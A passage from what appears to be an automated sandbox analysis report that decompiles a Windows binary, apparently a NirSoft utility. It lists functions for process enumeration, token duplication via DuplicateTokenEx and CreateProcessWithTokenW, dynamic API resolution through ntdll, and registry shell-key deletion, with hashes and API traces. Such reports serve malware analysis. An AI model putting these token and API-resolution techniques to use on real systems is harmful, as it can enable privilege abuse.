                                                                                      				if(_t4 == 0) {
                                                                                      					L9:
                                                                                      					return _t2;
                                                                                      				}
                                                                                      				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                      				 *0x40f83c = _t2;
                                                                                      				if(_t2 != 0) {
                                                                                      					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                      					 *0x40f834 = _t2;
                                                                                      					if(_t2 != 0) {
                                                                                      						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                      						 *0x40f830 = _t2;
                                                                                      						if(_t2 != 0) {
                                                                                      							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                      							 *0x40f5c4 = _t2;
                                                                                      							if(_t2 != 0) {
                                                                                      								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                      								 *0x40f828 = _t2;
                                                                                      								if(_t2 != 0) {
                                                                                      									 *0x4101b8 = 1;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				goto L9;
                                                                                      			}







                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                      • API String ID: 667068680-3953557276
                                                                                      • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                      • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                      • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                      • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 56%
                                                                                      			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                      				void _v514;
                                                                                      				char _v516;
                                                                                      				void _v1026;
                                                                                      				char _v1028;
                                                                                      				void _v1538;
                                                                                      				char _v1540;
                                                                                      				void* _t39;
                                                                                      				intOrPtr* _t50;
                                                                                      				void* _t61;
                                                                                      
                                                                                      				_t50 = __ecx;
                                                                                      				_push(0x1fe);
                                                                                      				_push(0);
                                                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                      					_v1540 = 0;
                                                                                      					memset( &_v1538, ??, ??);
                                                                                      					_v1028 = 0;
                                                                                      					memset( &_v1026, 0, 0x1fe);
                                                                                      					_v516 = 0;
                                                                                      					memset( &_v514, 0, 0x1fe);
                                                                                      					L0040B1EC();
                                                                                      					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                      					L0040B1EC();
                                                                                      					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                      					if (_t39 != 0) goto L3;
                                                                                      					return _t39;
                                                                                      				}
                                                                                      				_v516 = 0;
                                                                                      				memset( &_v514, ??, ??);
                                                                                      				_v1028 = 0;
                                                                                      				memset( &_v1026, 0, 0x1fe);
                                                                                      				L0040B1EC();
                                                                                      				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                      				L0040B1EC();
                                                                                      				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                      			}













                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: %%0.%df
                                                                                      • API String ID: 3473751417-763548558
                                                                                      • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                      • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                      • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                      • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 51%
                                                                                      			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                      				void _v8202;
                                                                                      				short _v8204;
                                                                                      				void* _t27;
                                                                                      				short _t29;
                                                                                      				short _t40;
                                                                                      				void* _t41;
                                                                                      				struct HMENU__* _t43;
                                                                                      				short _t50;
                                                                                      				void* _t52;
                                                                                      				struct HMENU__* _t59;
                                                                                      
                                                                                      				E0040B550(0x2008, __ecx);
                                                                                      				_t65 = _a8 - 4;
                                                                                      				if(_a8 != 4) {
                                                                                      					__eflags = _a8 - 5;
                                                                                      					if(_a8 == 5) {
                                                                                      						_t50 =  *0x40fe2c; // 0x0
                                                                                      						__eflags = _t50;
                                                                                      						if(_t50 == 0) {
                                                                                      							L8:
                                                                                      							_push(_a12);
                                                                                      							_t27 = 5;
                                                                                      							E00405E8D(_t27);
                                                                                      							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                      							__eflags = _t29;
                                                                                      							_a8 = _t29;
                                                                                      							if(_t29 == 0) {
                                                                                      								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                      							}
                                                                                      							_v8204 = 0;
                                                                                      							memset( &_v8202, 0, 0x2000);
                                                                                      							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                      							__eflags = _v8204;
                                                                                      							if(__eflags != 0) {
                                                                                      								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                      							}
                                                                                      							EnumChildWindows(_a8, E0040614F, 0);
                                                                                      							DestroyWindow(_a8);
                                                                                      						} else {
                                                                                      							while(1) {
                                                                                      								_t40 =  *_t50;
                                                                                      								__eflags = _t40;
                                                                                      								if(_t40 == 0) {
                                                                                      									goto L8;
                                                                                      								}
                                                                                      								__eflags = _t40 - _a12;
                                                                                      								if(_t40 != _a12) {
                                                                                      									_t50 = _t50 + 4;
                                                                                      									__eflags = _t50;
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L13;
                                                                                      							}
                                                                                      							goto L8;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_push(_a12);
                                                                                      					_t41 = 4;
                                                                                      					E00405E8D(_t41);
                                                                                      					_pop(_t52);
                                                                                      					_t43 = LoadMenuW(_a4, _a12);
                                                                                      					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                      					_t59 = _t43;
                                                                                      					_push(1);
                                                                                      					_push(_t59);
                                                                                      					_push(_a12);
                                                                                      					E0040605E(_t52, _t65);
                                                                                      					DestroyMenu(_t59);
                                                                                      				}
                                                                                      				L13:
                                                                                      				return 1;
                                                                                      			}














                                                                                      APIs
                                                                                      • LoadMenuW.USER32 ref: 00406236
                                                                                        • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                        • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                        • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                        • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                      • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                      • CreateDialogParamW.USER32 ref: 004062A9
                                                                                      • GetDesktopWindow.USER32 ref: 004062B4
                                                                                      • CreateDialogParamW.USER32 ref: 004062C1
                                                                                      • memset.MSVCRT ref: 004062DA
                                                                                      • GetWindowTextW.USER32 ref: 004062F1
                                                                                      • EnumChildWindows.USER32 ref: 0040631E
                                                                                      • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                        • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                      • String ID: caption
                                                                                      • API String ID: 973020956-4135340389
                                                                                      • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                      • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                      • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                      • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 65%
                                                                                      			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                      				void _v2050;
                                                                                      				char _v2052;
                                                                                      				void _v4098;
                                                                                      				long _v4100;
                                                                                      				void _v6146;
                                                                                      				char _v6148;
                                                                                      				void* __esi;
                                                                                      				void* _t43;
                                                                                      				intOrPtr* _t49;
                                                                                      				intOrPtr* _t57;
                                                                                      				void* _t58;
                                                                                      				void* _t59;
                                                                                      				intOrPtr _t62;
                                                                                      				intOrPtr _t63;
                                                                                      
                                                                                      				_t49 = __ecx;
                                                                                      				E0040B550(0x1800, __ecx);
                                                                                      				_t57 = _t49;
                                                                                      				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                      				_v4100 = 0;
                                                                                      				memset( &_v4098, 0, 0x7fe);
                                                                                      				_v2052 = 0;
                                                                                      				memset( &_v2050, 0, 0x7fe);
                                                                                      				_v6148 = 0;
                                                                                      				memset( &_v6146, 0, 0x7fe);
                                                                                      				_t59 = _t58 + 0x24;
                                                                                      				_t62 =  *0x40fe30; // 0x0
                                                                                      				if(_t62 != 0) {
                                                                                      					_push(0x40fe30);
                                                                                      					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                      					_push(0x400);
                                                                                      					_push( &_v2052);
                                                                                      					L0040B1EC();
                                                                                      					_t59 = _t59 + 0x10;
                                                                                      				}
                                                                                      				_t63 =  *0x40fe28; // 0x0
                                                                                      				if(_t63 != 0) {
                                                                                      					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                      				}
                                                                                      				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                      				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                      				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                      				_push(0x400);
                                                                                      				_push( &_v6148);
                                                                                      				L0040B1EC();
                                                                                      				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                      				_t64 = _a8 - 5;
                                                                                      				if(_a8 == 5) {
                                                                                      					return E00407D03(_t57, _t64, _a4);
                                                                                      				}
                                                                                      				return _t43;
                                                                                      			}


















                                                                                      APIs
                                                                                      Strings
                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                      • API String ID: 1283228442-2366825230
                                                                                      • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                      • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                      • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                      • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                      				void _v526;
                                                                                      				long _v528;
                                                                                      				wchar_t* _t17;
                                                                                      				signed int _t40;
                                                                                      				wchar_t* _t50;
                                                                                      
                                                                                      				_t50 = __edi;
                                                                                      				if(__esi[0] != 0x3a) {
                                                                                      					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                      					if(_t17 == 0) {
                                                                                      						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                      						if(_t40 < 0) {
                                                                                      							if( *__esi != 0x5c) {
                                                                                      								wcscpy(__edi, __esi);
                                                                                      							} else {
                                                                                      								_v528 = 0;
                                                                                      								memset( &_v526, 0, 0x208);
                                                                                      								E00404C08( &_v528);
                                                                                      								memcpy(__edi,  &_v528, 4);
                                                                                      								__edi[1] = __edi[1] & 0x00000000;
                                                                                      								wcscat(__edi, __esi);
                                                                                      							}
                                                                                      						} else {
                                                                                      							_v528 = 0;
                                                                                      							memset( &_v526, 0, 0x208);
                                                                                      							E00404C08( &_v528);
                                                                                      							wcscpy(__edi,  &_v528);
                                                                                      							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                      						}
                                                                                      						L11:
                                                                                      						return _t50;
                                                                                      					}
                                                                                      					_push( &(_t17[0]));
                                                                                      					L4:
                                                                                      					wcscpy(_t50, ??);
                                                                                      					goto L11;
                                                                                      				}
                                                                                      				_push(__esi);
                                                                                      				goto L4;
                                                                                      			}









                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00409223
                                                                                      • wcscpy.MSVCRT ref: 00409233
                                                                                        • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                        • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                        • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                      • wcscpy.MSVCRT ref: 00409282
                                                                                      • wcscat.MSVCRT ref: 0040928D
                                                                                      • memset.MSVCRT ref: 00409269
                                                                                        • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                        • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                      • memset.MSVCRT ref: 004092B1
                                                                                      • memcpy.MSVCRT ref: 004092CC
                                                                                      • wcscat.MSVCRT ref: 004092D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                      • String ID: \systemroot
                                                                                      • API String ID: 4173585201-1821301763
                                                                                      • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                      • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                      • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                      • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 48%
                                                                                      			E00409C70(signed int* _a4) {
                                                                                      				signed int _v8;
                                                                                      				_Unknown_base(*)()* _v12;
                                                                                      				char* _v16;
                                                                                      				int _v18;
                                                                                      				signed int _v20;
                                                                                      				char _v36;
                                                                                      				intOrPtr* _t21;
                                                                                      				struct HINSTANCE__* _t22;
                                                                                      				signed int _t23;
                                                                                      				signed int _t24;
                                                                                      				_Unknown_base(*)()* _t26;
                                                                                      				char* _t28;
                                                                                      				int _t31;
                                                                                      
                                                                                      				_t21 = _a4;
                                                                                      				if( *_t21 == 0) {
                                                                                      					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                      					_v8 = _t22;
                                                                                      					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                      					 *_a4 = _t23;
                                                                                      					_t24 = _t23 ^ _v8;
                                                                                      					if((_t24 & 0xfff00000) != 0) {
                                                                                      						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                      						_v20 = _v20 & 0x00000000;
                                                                                      						_v12 = _t26;
                                                                                      						asm("stosd");
                                                                                      						asm("stosw");
                                                                                      						asm("movsd");
                                                                                      						asm("movsd");
                                                                                      						asm("movsd");
                                                                                      						asm("movsw");
                                                                                      						_t28 =  &_v36;
                                                                                      						asm("movsb");
                                                                                      						_v16 = _t28;
                                                                                      						_v20 = strlen(_t28);
                                                                                      						_t31 = strlen( &_v36);
                                                                                      						_v18 = _t31;
                                                                                      						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                      					}
                                                                                      					return _t24;
                                                                                      				}
                                                                                      				return _t21;
                                                                                      			}

















                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                      • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                      • strlen.MSVCRT ref: 00409CE4
                                                                                      • strlen.MSVCRT ref: 00409CF1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcstrlen
                                                                                      • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                      • API String ID: 1027343248-2054640941
                                                                                      • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                      • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                      • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                      • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040289F(intOrPtr* __esi) {
                                                                                      				void* _t9;
                                                                                      				struct HINSTANCE__* _t10;
                                                                                      				_Unknown_base(*)()* _t14;
                                                                                      
                                                                                      				if( *(__esi + 0x10) == 0) {
                                                                                      					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                      					 *(__esi + 0x10) = _t10;
                                                                                      					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                      					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                      					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                      					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                      					 *(__esi + 8) = _t14;
                                                                                      					return _t14;
                                                                                      				}
                                                                                      				return _t9;
                                                                                      			}







                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                      • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                      • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                      • API String ID: 2238633743-1970996977
                                                                                      • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                      • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                      • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                      • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 39%
                                                                                      			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                      				void* _v8;
                                                                                      				void _v2054;
                                                                                      				short _v2056;
                                                                                      				void _v4102;
                                                                                      				short _v4104;
                                                                                      				signed int _t28;
                                                                                      				void* _t34;
                                                                                      
                                                                                      				E0040B550(0x1004, __ecx);
                                                                                      				_t36 = 0;
                                                                                      				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                      					_v2056 = 0;
                                                                                      					memset( &_v2054, 0, 0x7fe);
                                                                                      					_v4104 = 0;
                                                                                      					memset( &_v4102, 0, 0x7fe);
                                                                                      					_t34 = __ebx + 0x20a;
                                                                                      					_push(_t34);
                                                                                      					_push(__ebx);
                                                                                      					_push(L"%s\\shell\\%s\\command");
                                                                                      					_push(0x3ff);
                                                                                      					_push( &_v2056);
                                                                                      					L0040B1EC();
                                                                                      					_push(_t34);
                                                                                      					_push(__ebx);
                                                                                      					_push(L"%s\\shell\\%s");
                                                                                      					_push(0x3ff);
                                                                                      					_push( &_v4104);
                                                                                      					L0040B1EC();
                                                                                      					RegDeleteKeyW(_v8,  &_v2056);
                                                                                      					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                      					asm("sbb esi, esi");
                                                                                      					_t36 =  ~_t28 + 1;
                                                                                      					RegCloseKey(_v8);
                                                                                      				}
                                                                                      				return _t36;
                                                                                      			}











                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Delete_snwprintfmemset$Close
                                                                                      • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                      • API String ID: 1018939227-3575174989
                                                                                      • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                      • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                      • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                      • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E0040313D(void* __ecx) {
                                                                                      				intOrPtr _v8;
                                                                                      				char _v12;
                                                                                      				struct HWND__* _t6;
                                                                                      				_Unknown_base(*)()* _t11;
                                                                                      				struct HWND__* _t15;
                                                                                      				void* _t20;
                                                                                      				struct HINSTANCE__* _t23;
                                                                                      
                                                                                      				_v12 = 8;
                                                                                      				_v8 = 0xff;
                                                                                      				_t15 = 0;
                                                                                      				_t20 = 0;
                                                                                      				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                      				if(_t23 == 0) {
                                                                                      					L5:
                                                                                      					__imp__#17();
                                                                                      					_t6 = 1;
                                                                                      					L6:
                                                                                      					if(_t6 != 0) {
                                                                                      						return 1;
                                                                                      					} else {
                                                                                      						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                      						return 0;
                                                                                      					}
                                                                                      				}
                                                                                      				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                      				if(_t11 != 0) {
                                                                                      					_t20 = 1;
                                                                                      					_t15 =  *_t11( &_v12);
                                                                                      				}
                                                                                      				FreeLibrary(_t23);
                                                                                      				if(_t20 == 0) {
                                                                                      					goto L5;
                                                                                      				} else {
                                                                                      					_t6 = _t15;
                                                                                      					goto L6;
                                                                                      				}
                                                                                      			}











                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
